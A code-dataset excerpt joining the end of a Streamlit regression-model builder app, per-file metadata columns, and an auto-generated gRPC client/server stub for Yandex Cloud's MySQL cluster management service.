    scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    st.sidebar.write('---')
    st.sidebar.header("Hyperparameters for Gradient Boosting Regression")
    st.sidebar.subheader("Loss")
    loss = st.sidebar.selectbox("Enter from the options", options=['All', 'squared_error', 'absolute_error', 'huber',
                                                                   'quantile'])
    st.sidebar.subheader("Learning Rate")
    # Comma-separated numeric lists: collect_numbers parses floats,
    # collect_numbers_int parses integer-valued parameters. Defaults match
    # sklearn's GradientBoostingRegressor defaults.
    numbers = st.sidebar.text_input("Enter values for 'learning rate'. (Separate values with ,)", value='0.1')
    learning_rate = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter number of estimators. (Separate values with ,)", value='100')
    n_estimators = collect_numbers_int(numbers)
    numbers = st.sidebar.text_input("Enter values for 'Subsample'. (Separate values with ,)", value='1.0')
    subsample = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter minimum sample Split. (Separate values with ,)", value='2')
    min_samples_split = collect_numbers_int(numbers)
    numbers = st.sidebar.text_input("Enter minimum samples leaf. (Separate values with ,)", value='1')
    min_samples_leaf = collect_numbers_int(numbers)
    numbers = st.sidebar.text_input("Enter maximum depth. (Separate values with ,)", value='3')
    max_depth = collect_numbers_int(numbers)
    max_features = st.sidebar.selectbox("Maximum Features", options=['All', 'auto', 'sqrt', 'log2'])
    # 'All' expands to every candidate; otherwise wrap the single choice.
    if loss == 'All':
        loss = ['squared_error', 'absolute_error', 'huber', 'quantile']
    else:
        loss = [loss]
    if max_features == 'All':
        max_features = ['auto', 'sqrt', 'log2']
    else:
        max_features = [max_features]
    # Hyperparameter grid for grid-search tuning of gradient boosting.
    param_grid = dict(loss=loss, learning_rate=learning_rate, n_estimators=n_estimators, subsample=subsample,
                      min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf,
                      max_depth=max_depth, max_features=max_features)
# main Body ...............................................................................................
# Render the dataset preview, then dispatch to the builder function that
# matches the sidebar's selected regressor (`reg`).
st.subheader('Dataset')
if uploaded_file is not None:
    df = pd.read_csv(uploaded_file)
    st.write(df)
    # NOTE(review): this if-chain is duplicated verbatim in the example-dataset
    # branch below; a dict mapping reg -> builder would remove the duplication.
    if reg == 'Random Forest Regression':
        build_model_RandomForestRegressor(df)
    if reg == 'Adaboost':
        build_model_Adaboost_Regressor(df)
    if reg == 'Linear Regression':
        build_model_Linear_Regressor(df)
    if reg == 'SVR':
        build_model_SVR(df)
    if reg == 'SGD Regression':
        build_model_SGD(df)
    if reg == 'Kernel Ridge Regression':
        build_model_KernelRidge(df)
    if reg == 'ElasticNet Regression':
        build_model_ElasticNet(df)
    if reg == 'Gradient Boosting Regression':
        build_model_GradientBoosting(df)
else:
    # No upload yet: offer the sklearn diabetes dataset as a demo.
    st.info('Awaiting for CSV file to be uploaded.')
    if st.button('Press to use Example Dataset'):
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
        st.markdown('The **Diabetes** dataset is used as the example.')
        st.write(df.head(5))
        if reg == 'Random Forest Regression':
            build_model_RandomForestRegressor(df)
        if reg == 'Adaboost':
            build_model_Adaboost_Regressor(df)
        if reg == 'Linear Regression':
            build_model_Linear_Regressor(df)
        if reg == 'SVR':
            build_model_SVR(df)
        if reg == 'SGD Regression':
            build_model_SGD(df)
        if reg == 'Kernel Ridge Regression':
            build_model_KernelRidge(df)
        if reg == 'ElasticNet Regression':
            build_model_ElasticNet(df)
        if reg == 'Gradient Boosting Regression':
            build_model_GradientBoosting(df)
| 39.018466
| 147
| 0.619953
| 7,631
| 54,938
| 4.290263
| 0.054908
| 0.025291
| 0.022542
| 0.020159
| 0.848743
| 0.833379
| 0.823086
| 0.821894
| 0.811448
| 0.798436
| 0
| 0.013981
| 0.237085
| 54,938
| 1,408
| 148
| 39.018466
| 0.767137
| 0.101296
| 0
| 0.825153
| 0
| 0.002045
| 0.176295
| 0.001533
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009202
| false
| 0
| 0.023517
| 0
| 0.033742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63085c24e340e92fae937acc8225a7326b90926f
| 38,244
|
py
|
Python
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 36
|
2018-12-23T13:51:50.000Z
|
2022-03-25T07:48:24.000Z
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 15
|
2019-02-28T04:55:09.000Z
|
2022-03-06T23:17:24.000Z
|
yandex/cloud/mdb/mysql/v1/cluster_service_pb2_grpc.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 18
|
2019-02-23T07:10:57.000Z
|
2022-03-28T14:41:08.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.mdb.mysql.v1 import cluster_pb2 as yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2
from yandex.cloud.mdb.mysql.v1 import cluster_service_pb2 as yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class ClusterServiceStub(object):
    """A set of methods for managing MySQL clusters.

    NOTE: generated by the gRPC protocol compiler (see file header) —
    regenerate from the .proto definition instead of editing by hand.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Each attribute is a callable RPC bound to the service's full method
        # path, with protobuf (de)serializers for request/response messages.
        self.Get = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Get',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.FromString,
                )
        self.List = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/List',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
                )
        self.Create = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Create',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Update = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Update',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Delete = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Delete',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Start = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Start',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Stop = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Stop',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Move = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Move',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Backup = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Backup',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.Restore = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/Restore',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.RescheduleMaintenance = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/RescheduleMaintenance',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.StartFailover = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/StartFailover',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.ListLogs = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/ListLogs',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
                )
        # StreamLogs is the only server-streaming RPC on this service.
        self.StreamLogs = channel.unary_stream(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/StreamLogs',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
                )
        self.ListOperations = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/ListOperations',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
                )
        self.ListBackups = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/ListBackups',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
                )
        self.ListHosts = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/ListHosts',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
                )
        self.AddHosts = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/AddHosts',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.UpdateHosts = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/UpdateHosts',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
        self.DeleteHosts = channel.unary_unary(
                '/yandex.cloud.mdb.mysql.v1.ClusterService/DeleteHosts',
                request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
                response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
                )
class ClusterServiceServicer(object):
    """A set of methods for managing MySQL clusters.

    NOTE: generated by the gRPC protocol compiler (see file header) —
    subclass and override the methods below to implement the service;
    regenerate from the .proto instead of editing this file.
    Every stub method reports UNIMPLEMENTED to the client and raises
    NotImplementedError locally.
    """

    def Get(self, request, context):
        """Returns the specified MySQL cluster.

        To get the list of available MySQL clusters, make a [List] request.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def List(self, request, context):
        """Retrieves the list of MySQL clusters that belong to the specified folder.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Create(self, request, context):
        """Creates a MySQL cluster in the specified folder.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Update(self, request, context):
        """Modifies the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Delete(self, request, context):
        """Deletes the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Start(self, request, context):
        """Starts the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Stop(self, request, context):
        """Stops the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Move(self, request, context):
        """Moves the specified MySQL cluster to the specified folder.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Backup(self, request, context):
        """Creates a backup for the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Restore(self, request, context):
        """Creates a new MySQL cluster using the specified backup.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def RescheduleMaintenance(self, request, context):
        """Reschedules planned maintenance operation.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def StartFailover(self, request, context):
        """Start a manual failover on the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListLogs(self, request, context):
        """Retrieves logs for the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def StreamLogs(self, request, context):
        """Same as ListLogs but using server-side streaming. Also allows for 'tail -f' semantics.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListOperations(self, request, context):
        """Retrieves the list of operations for the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListBackups(self, request, context):
        """Retrieves the list of available backups for the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListHosts(self, request, context):
        """Retrieves a list of hosts for the specified MySQL cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def AddHosts(self, request, context):
        """Creates new hosts for a cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateHosts(self, request, context):
        """Updates the specified hosts.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteHosts(self, request, context):
        """Deletes the specified hosts for a cluster.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_ClusterServiceServicer_to_server(servicer, server):
    """Register a ClusterServiceServicer implementation with a grpc.Server.

    NOTE: generated by the gRPC protocol compiler (see file header) —
    regenerate from the .proto instead of editing by hand.

    Args:
        servicer: An object implementing the ClusterServiceServicer methods.
        server: The grpc.Server to attach the handlers to.
    """
    # Map each RPC name to a handler pairing the servicer method with the
    # inverse (de)serializers of the client stub above.
    rpc_method_handlers = {
            'Get': grpc.unary_unary_rpc_method_handler(
                    servicer.Get,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.SerializeToString,
            ),
            'List': grpc.unary_unary_rpc_method_handler(
                    servicer.List,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.SerializeToString,
            ),
            'Create': grpc.unary_unary_rpc_method_handler(
                    servicer.Create,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Update': grpc.unary_unary_rpc_method_handler(
                    servicer.Update,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Delete': grpc.unary_unary_rpc_method_handler(
                    servicer.Delete,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Start': grpc.unary_unary_rpc_method_handler(
                    servicer.Start,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Stop': grpc.unary_unary_rpc_method_handler(
                    servicer.Stop,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Move': grpc.unary_unary_rpc_method_handler(
                    servicer.Move,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Backup': grpc.unary_unary_rpc_method_handler(
                    servicer.Backup,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'Restore': grpc.unary_unary_rpc_method_handler(
                    servicer.Restore,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'RescheduleMaintenance': grpc.unary_unary_rpc_method_handler(
                    servicer.RescheduleMaintenance,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'StartFailover': grpc.unary_unary_rpc_method_handler(
                    servicer.StartFailover,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'ListLogs': grpc.unary_unary_rpc_method_handler(
                    servicer.ListLogs,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.SerializeToString,
            ),
            # StreamLogs is the only server-streaming handler.
            'StreamLogs': grpc.unary_stream_rpc_method_handler(
                    servicer.StreamLogs,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.SerializeToString,
            ),
            'ListOperations': grpc.unary_unary_rpc_method_handler(
                    servicer.ListOperations,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.SerializeToString,
            ),
            'ListBackups': grpc.unary_unary_rpc_method_handler(
                    servicer.ListBackups,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.SerializeToString,
            ),
            'ListHosts': grpc.unary_unary_rpc_method_handler(
                    servicer.ListHosts,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.SerializeToString,
            ),
            'AddHosts': grpc.unary_unary_rpc_method_handler(
                    servicer.AddHosts,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'UpdateHosts': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateHosts,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
            'DeleteHosts': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteHosts,
                    request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.FromString,
                    response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'yandex.cloud.mdb.mysql.v1.ClusterService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ClusterService(object):
"""A set of methods for managing MySQL clusters.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Get',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/List',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Create',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Update',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
           target,
           options=(),
           channel_credentials=None,
           call_credentials=None,
           insecure=False,
           compression=None,
           wait_for_ready=None,
           timeout=None,
           metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Delete.

    Serializes a DeleteClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Delete',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
          target,
          options=(),
          channel_credentials=None,
          call_credentials=None,
          insecure=False,
          compression=None,
          wait_for_ready=None,
          timeout=None,
          metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Start.

    Serializes a StartClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Start',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
         target,
         options=(),
         channel_credentials=None,
         call_credentials=None,
         insecure=False,
         compression=None,
         wait_for_ready=None,
         timeout=None,
         metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Stop.

    Serializes a StopClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Stop',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
